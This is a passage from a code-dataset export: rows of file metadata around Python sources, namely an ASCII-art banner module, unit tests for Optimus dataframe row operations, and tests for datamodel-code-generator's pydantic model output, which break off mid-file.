| 22.142857 | 47 | 0.832258 | 22 | 155 | 5.863636 | 0.5 | 0.155039 | 0.263566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103226 | 155 | 6 | 48 | 25.833333 | 0.928058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54d0fe05fb05525ffe2b5adeaa2003d8939a592f | 1,689 | py | Python | src/banners.py | AveCaesarMorituriTeSalutant/BAT_CORE | 5e8acc60ff4871d42070e30cb6c6f4102660cd29 | [
"MIT"
] | 10 | 2020-12-10T09:40:08.000Z | 2022-02-23T04:38:31.000Z | src/banners.py | AveCaesarMorituriTeSalutant/BAT_CORE | 5e8acc60ff4871d42070e30cb6c6f4102660cd29 | [
"MIT"
] | null | null | null | src/banners.py | AveCaesarMorituriTeSalutant/BAT_CORE | 5e8acc60ff4871d42070e30cb6c6f4102660cd29 | [
"MIT"
] | 3 | 2021-04-12T14:43:30.000Z | 2021-05-31T07:47:43.000Z | from random import choice
BANNERS = [
"""
%% %%
%%%%% %%%%%
%%%%%%%%%%% %%%%%%%%%%%
%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%% % % %%%%%%%%%%%%%
%%%%%%%%%%%%% %% %% %%%%%%%%%%%%%
%%%%%%%%%%%%%% %%% %%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%% %%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%% %%%%%%%%% %%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%
%%%
%
GitHub - AveCaesarMorituriTeSalutant
WebPage - batt.gq
Created by Islamov Magomed
"""
]
def get_banner():
    return choice(BANNERS)
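

if __name__ == "__main__":
    # Editor's demo: print one randomly chosen banner. Only one banner is
    # defined above, so the choice is deterministic for now.
    print(get_banner())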
| 46.916667 | 96 | 0.076969 | 20 | 1,689 | 6.45 | 0.9 | 0.20155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.677916 | 1,689 | 35 | 97 | 48.257143 | 0.237132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
54d49fd9236f3c6a4dbb6935c27546ea72838ea5 | 73 | py | Python | resources/__init__.py | astheeggeggs/ukbb_pan_ancestry | 5e378d5582723a575da9b473c7220d2602f4bce9 | [
"MIT"
] | null | null | null | resources/__init__.py | astheeggeggs/ukbb_pan_ancestry | 5e378d5582723a575da9b473c7220d2602f4bce9 | [
"MIT"
] | null | null | null | resources/__init__.py | astheeggeggs/ukbb_pan_ancestry | 5e378d5582723a575da9b473c7220d2602f4bce9 | [
"MIT"
] | null | null | null | from .phenotypes import *
from .genotypes import *
from .results import * | 24.333333 | 25 | 0.767123 | 9 | 73 | 6.222222 | 0.555556 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150685 | 73 | 3 | 26 | 24.333333 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0714ddc04d7cd16006b9202e989e22c10414b2db | 4,985 | py | Python | tests/test_df_rows.py | XD-DENG/Optimus | 13e7b180f0970addae77cafe128bd2a93be138a2 | [
"Apache-2.0"
] | 1 | 2020-08-15T06:58:59.000Z | 2020-08-15T06:58:59.000Z | tests/test_df_rows.py | XD-DENG/Optimus | 13e7b180f0970addae77cafe128bd2a93be138a2 | [
"Apache-2.0"
] | null | null | null | tests/test_df_rows.py | XD-DENG/Optimus | 13e7b180f0970addae77cafe128bd2a93be138a2 | [
"Apache-2.0"
] | null | null | null | from pyspark.sql.types import *
from optimus import Optimus
from optimus.helpers.json import json_enconding
from optimus.helpers.functions import deep_sort
import unittest
from pyspark.ml.linalg import Vectors, VectorUDT, DenseVector
import numpy as np
nan = np.nan
from optimus.audf import abstract_udf as audf
import datetime
from pyspark.sql import functions as F
op = Optimus(master='local')
source_df=op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' I like fish ', 1, 'dog dog', 'housé', 5, 'a'), (' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1'), (None, 3, 'eagle', 'glass', 8, 'c')])
class Test_df_rows(unittest.TestCase):
maxDiff = None
@staticmethod
def test_rows_append():
actual_df =source_df.rows.append([('this is a word', 2, 'this is an animal', 'this is a thing', 64, 'this is a filter')])
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' I like fish ', 1, 'dog dog', 'housé', 5, 'a'), (' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1'), (None, 3, 'eagle', 'glass', 8, 'c'), ('this is a word', 2, 'this is an animal', 'this is a thing', 64, 'this is a filter')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_between():
actual_df =source_df.rows.between('second',6,8)
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [('simpsons cat lady', 2, 'frog', 'table', 7, '1')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_between_equal():
        actual_df = source_df.rows.between('second', 6, 8, equal=True)
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1'), (None, 3, 'eagle', 'glass', 8, 'c')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_between_invert_equal():
        actual_df = source_df.rows.between('second', 6, 8, invert=True, equal=True)
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' I like fish ', 1, 'dog dog', 'housé', 5, 'a'), (' zombies', 2, 'cat', 'tv', 6, 'b'), (None, 3, 'eagle', 'glass', 8, 'c')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_drop_by_dtypes():
        actual_df = source_df.rows.drop_by_dtypes('filter', 'integer')
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' I like fish ', 1, 'dog dog', 'housé', 5, 'a'), (' zombies', 2, 'cat', 'tv', 6, 'b'), (None, 3, 'eagle', 'glass', 8, 'c')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_is_in():
        actual_df = source_df.rows.is_in('num', 2)
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_select_by_dtypes():
        actual_df = source_df.rows.select_by_dtypes('filter', 'integer')
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [('simpsons cat lady', 2, 'frog', 'table', 7, '1')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_sort():
        actual_df = source_df.rows.sort('num', 'desc')
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(None, 3, 'eagle', 'glass', 8, 'c'), (' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1'), (' I like fish ', 1, 'dog dog', 'housé', 5, 'a')])
assert (expected_df.collect() == actual_df.collect())
| 89.017857 | 491 | 0.63651 | 671 | 4,985 | 4.61699 | 0.14158 | 0.162686 | 0.029051 | 0.034861 | 0.848289 | 0.828922 | 0.823434 | 0.793092 | 0.793092 | 0.774371 | 0 | 0.016033 | 0.124173 | 4,985 | 55 | 492 | 90.636364 | 0.693541 | 0 | 0 | 0.363636 | 0 | 0 | 0.204413 | 0 | 0 | 0 | 0 | 0 | 0.145455 | 1 | 0.145455 | false | 0 | 0.181818 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0724afbae93e926bc6375caf64713f7778d03433 | 26,994 | py | Python | tests/test_main.py | skalarsystems/datamodel-code-generator | 6055368ace6ca616bd2bd2b398e63a2dd226813c | [
"MIT"
] | null | null | null | tests/test_main.py | skalarsystems/datamodel-code-generator | 6055368ace6ca616bd2bd2b398e63a2dd226813c | [
"MIT"
] | null | null | null | tests/test_main.py | skalarsystems/datamodel-code-generator | 6055368ace6ca616bd2bd2b398e63a2dd226813c | [
"MIT"
] | null | null | null | import shutil
from pathlib import Path
from tempfile import TemporaryDirectory
from typing import Mapping
import pytest
from _pytest.capture import CaptureFixture
from _pytest.tmpdir import TempdirFactory
from freezegun import freeze_time
from prance import ValidationError
from datamodel_code_generator.__main__ import Exit, main
DATA_PATH: Path = Path(__file__).parent / 'data'
OPEN_API_DATA_PATH: Path = DATA_PATH / 'openapi'
JSON_SCHEMA_DATA_PATH: Path = DATA_PATH / 'jsonschema'
JSON_DATA_PATH: Path = DATA_PATH / 'json'
YAML_DATA_PATH: Path = DATA_PATH / 'yaml'
TIMESTAMP = '1985-10-26T01:21:00-07:00'
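# Each test below runs the CLI entry point (main) on a fixture schema and
# compares the generated module text verbatim; freeze_time pins the generated
# "timestamp:" header so the string comparison stays deterministic.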
@freeze_time('2019-07-26')
def test_main():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_base_class():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
'--base-class',
'custom_module.Base',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, Field
from custom_module import Base
class Pet(Base):
id: int
name: str
tag: Optional[str] = None
class Pets(Base):
__root__: List[Pet]
class User(Base):
id: int
name: str
tag: Optional[str] = None
class Users(Base):
__root__: List[User]
class Id(Base):
__root__: str
class Rules(Base):
__root__: List[str]
class Error(Base):
code: int
message: str
class api(Base):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(Base):
__root__: List[api]
class Event(Base):
name: Optional[str] = None
class Result(Base):
event: Optional[Event] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_target_python_version():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
'--target-python-version',
'3.6',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List['Pet']
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List['User']
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List['api']
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional['Event'] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_autodetect():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(JSON_SCHEMA_DATA_PATH / 'person.json'),
'--output',
str(output_file),
'--input-file-type',
'auto',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Any, List, Optional
from pydantic import BaseModel, Field, conint
class Person(BaseModel):
firstName: Optional[str] = Field(None, description="The person\'s first name.")
lastName: Optional[str] = Field(None, description="The person\'s last name.")
age: Optional[conint(ge=0.0)] = Field(
None, description='Age in years which must be equal to or greater than zero.'
)
friends: Optional[List] = None
comment: Optional[Any] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_autodetect_failed():
with TemporaryDirectory() as input_dir, TemporaryDirectory() as output_dir:
input_file: Path = Path(input_dir) / 'input.yaml'
output_file: Path = Path(output_dir) / 'output.py'
input_file.write_text(':')
return_code: Exit = main(
[
'--input',
str(input_file),
'--output',
str(output_file),
'--input-file-type',
'auto',
]
)
assert return_code == Exit.ERROR
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_jsonschema():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(JSON_SCHEMA_DATA_PATH / 'person.json'),
'--output',
str(output_file),
'--input-file-type',
'jsonschema',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Any, List, Optional
from pydantic import BaseModel, Field, conint
class Person(BaseModel):
firstName: Optional[str] = Field(None, description="The person\'s first name.")
lastName: Optional[str] = Field(None, description="The person\'s last name.")
age: Optional[conint(ge=0.0)] = Field(
None, description='Age in years which must be equal to or greater than zero.'
)
friends: Optional[List] = None
comment: Optional[Any] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_jsonschema_nested_deep():
import os
os.chdir(DATA_PATH / 'jsonschema')
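    # NOTE: the working directory is changed and never restored, so tests that
    # run after this one inherit DATA_PATH / 'jsonschema' as their cwd.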
with TemporaryDirectory() as output_dir:
output_init_file: Path = Path(output_dir) / '__init__.py'
output_nested_file: Path = Path(output_dir) / 'nested/deep.py'
output_empty_parent_nested_file: Path = Path(
output_dir
) / 'empty_parent/nested/deep.py'
return_code: Exit = main(
[
'--input',
str(JSON_SCHEMA_DATA_PATH / 'nested_person.json'),
'--output',
str(output_dir),
'--input-file-type',
'jsonschema',
]
)
assert return_code == Exit.OK
print(list(Path(output_dir).iterdir()))
assert (
output_init_file.read_text()
== '''# generated by datamodel-codegen:
# filename: nested_person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
from .empty_parent.nested import deep as deep_1
from .nested import deep
class NestedPerson(BaseModel):
nested_deep_childJson: Optional[deep.Json] = None
nested_deep_childAnother: Optional[deep.Another] = None
empty_parent_nested_deep_childJson: Optional[deep_1.Json] = None
'''
)
assert (
output_nested_file.read_text()
== '''# generated by datamodel-codegen:
# filename: nested_person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
class Json(BaseModel):
firstName: Optional[str] = None
class Another(BaseModel):
firstName: Optional[str] = None
'''
)
assert (
output_empty_parent_nested_file.read_text()
== '''# generated by datamodel-codegen:
# filename: nested_person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
class Json(BaseModel):
firstName: Optional[str] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_json():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(JSON_DATA_PATH / 'pet.json'),
'--output',
str(output_file),
'--input-file-type',
'json',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: pet.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from pydantic import BaseModel
class Pet(BaseModel):
name: str
age: int
class Model(BaseModel):
Pet: Pet
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_json_failed():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(JSON_DATA_PATH / 'broken.json'),
'--output',
str(output_file),
'--input-file-type',
'json',
]
)
assert return_code == Exit.ERROR
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_yaml():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(YAML_DATA_PATH / 'pet.yaml'),
'--output',
str(output_file),
'--input-file-type',
'yaml',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: pet.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from pydantic import BaseModel
class Pet(BaseModel):
name: str
age: int
class Model(BaseModel):
Pet: Pet
'''
)
with pytest.raises(SystemExit):
main()
@pytest.mark.parametrize(
'expected',
[
{
(
'__init__.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
from . import models
class Id(BaseModel):
__root__: str
class Error(BaseModel):
code: int
message: str
class Result(BaseModel):
event: Optional[models.Event] = None
class Source(BaseModel):
country: Optional[str] = None
''',
(
'models.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from enum import Enum
from typing import Any, Dict, List, Optional, Union
from pydantic import BaseModel
class Species(Enum):
dog = 'dog'
cat = 'cat'
snake = 'snake'
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
species: Optional[Species] = None
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Event(BaseModel):
name: Optional[Union[str, float, int, bool, Dict[str, Any], List[str]]] = None
''',
(
'collections.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
from . import models
class Pets(BaseModel):
__root__: List[models.Pet]
class Users(BaseModel):
__root__: List[models.User]
class Rules(BaseModel):
__root__: List[str]
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List[api]
''',
(
'foo',
'__init__.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
from .. import Id
class Tea(BaseModel):
flavour: Optional[str] = None
id: Optional[Id] = None
class Cocoa(BaseModel):
quality: Optional[int] = None
''',
(
'foo',
'bar.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import Any, Dict, List, Optional
from pydantic import BaseModel
class Thing(BaseModel):
attributes: Optional[Dict[str, Any]] = None
class Thang(BaseModel):
attributes: Optional[List[Dict[str, Any]]] = None
class Clone(Thing):
pass
''',
(
'woo',
'__init__.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
''',
(
'woo',
'boo.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
from .. import Source, foo
class Chocolate(BaseModel):
flavour: Optional[str] = None
source: Optional[Source] = None
cocoa: Optional[foo.Cocoa] = None
''',
}
],
)
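# The 'expected' mapping above keys each generated file's path, as a tuple of
# segments relative to the output package, to that file's full expected text.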
def test_main_modular(
tmpdir_factory: TempdirFactory, expected: Mapping[str, str]
) -> None:
"""Test main function on modular file."""
output_directory = Path(tmpdir_factory.mktemp('output'))
input_filename = OPEN_API_DATA_PATH / 'modular.yaml'
output_path = output_directory / 'model'
with freeze_time(TIMESTAMP):
main(['--input', str(input_filename), '--output', str(output_path)])
for key, value in expected.items():
result = output_path.joinpath(*key).read_text()
assert result == value
def test_main_modular_no_file() -> None:
"""Test main function on modular file with no output name."""
input_filename = OPEN_API_DATA_PATH / 'modular.yaml'
assert main(['--input', str(input_filename)]) == Exit.ERROR
def test_main_modular_filename(tmpdir_factory: TempdirFactory) -> None:
"""Test main function on modular file with filename."""
output_directory = Path(tmpdir_factory.mktemp('output'))
input_filename = OPEN_API_DATA_PATH / 'modular.yaml'
output_filename = output_directory / 'model.py'
assert (
main(['--input', str(input_filename), '--output', str(output_filename)])
== Exit.ERROR
)
@pytest.mark.parametrize(
'expected',
[
'''\
# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
'''
],
)
def test_main_no_file(capsys: CaptureFixture, expected: str) -> None:
"""Test main function on non-modular file with no output name."""
input_filename = OPEN_API_DATA_PATH / 'api.yaml'
with freeze_time(TIMESTAMP):
main(['--input', str(input_filename)])
captured = capsys.readouterr()
assert captured.out == expected
assert not captured.err
@pytest.mark.parametrize(
'expected',
[
'''\
# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel): # 1 2, 1 2, this is just a pet
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = None
apiVersionNumber: Optional[str] = None
apiUrl: Optional[AnyUrl] = None
apiDocumentationUrl: Optional[AnyUrl] = None
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
'''
],
)
def test_main_custom_template_dir(capsys: CaptureFixture, expected: str) -> None:
"""Test main function with custom template directory."""
input_filename = OPEN_API_DATA_PATH / 'api.yaml'
custom_template_dir = DATA_PATH / 'templates'
extra_template_data = OPEN_API_DATA_PATH / 'extra_data.json'
with freeze_time(TIMESTAMP):
main(
[
'--input',
str(input_filename),
'--custom-template-dir',
str(custom_template_dir),
'--extra-template-data',
str(extra_template_data),
]
)
captured = capsys.readouterr()
assert captured.out == expected
assert not captured.err
@freeze_time('2019-07-26')
def test_pyproject():
with TemporaryDirectory() as output_dir:
output_dir = Path(output_dir)
        pyproject_toml = DATA_PATH / "project" / "pyproject.toml"
shutil.copy(pyproject_toml, output_dir)
output_file: Path = output_dir / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import (
annotations,
)
from typing import (
List,
Optional,
)
from pydantic import (
AnyUrl,
BaseModel,
Field,
)
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[
str
] = Field(
None,
description="To be used as a dataset parameter value",
)
apiVersionNumber: Optional[
str
] = Field(
None,
description="To be used as a version parameter value",
)
apiUrl: Optional[
AnyUrl
] = Field(
None,
description="The URL describing the dataset\'s fields",
)
apiDocumentationUrl: Optional[
AnyUrl
] = Field(
None,
description="A URL to the API console for each API",
)
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[
Event
] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_validation():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
'--validation',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
